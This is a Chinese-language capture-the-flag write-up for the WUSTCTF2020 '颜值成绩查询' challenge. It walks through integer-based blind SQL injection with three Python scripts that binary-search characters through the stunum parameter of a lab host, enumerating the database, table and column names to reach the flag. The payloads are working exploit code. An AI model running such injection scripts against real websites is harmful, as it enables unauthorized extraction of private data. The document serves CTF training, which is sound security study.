[WUSTCTF2020]颜值成绩查询
整数型注入,盲注。
速度快,一定要二分法。
爆库名:ctf
二分法核心payload
"if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
import requests url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum=" result = "" i = 0 while( True ): i = i + 1 head=32 tail=127 while( head < tail ): mid = (head + tail) >> 1 payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid) r = requests.get(url+payload) r.encoding = "utf-8" #print(url+payload) if "your score is: 100" in r.text : head = mid + 1 else: #print(r.text) tail = mid last = result if head!=32: result += chr(head) else: break print(result)
回显结果参考下图:
爆表
flag,score
import requests url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum=" result = "" i = 0 while( True ): i = i + 1 head=32 tail=127 while( head < tail ): mid = (head + tail) >> 1 #payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid) payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid) r = requests.get(url+payload) r.encoding = "utf-8" #print(url+payload) if "your score is: 100" in r.text : head = mid + 1 else: #print(r.text) tail = mid last = result if head!=32: result += chr(head) else: break print(result)
回显结果参考下图:
爆列名
爆出flag和value两个字段
import requests url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum=" result = "" i = 0 while( True ): i = i + 1 head=32 tail=127 while( head < tail ): mid = (head + tail) >> 1 #payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid) #payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid) payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i , mid) r = requests.get(url+payload) r.encoding = "utf-8" #print(url+payload) if "your score is: 100" in r.text : head = mid + 1 else: #print(r.text) tail = mid last = result if head!=32: result += chr(head) else: break print(result)
爆信息
flag表中有flag和value两个字段
爆flag字段
爆的时候结果如下,没有给flag猜测是在value字段。
爆value字段,发现就是在value字段了。如果没有的画要爆一下别的。
还有啊二分法,一定要二分法。不然,遇到某些题可能你爆完比赛也结束了。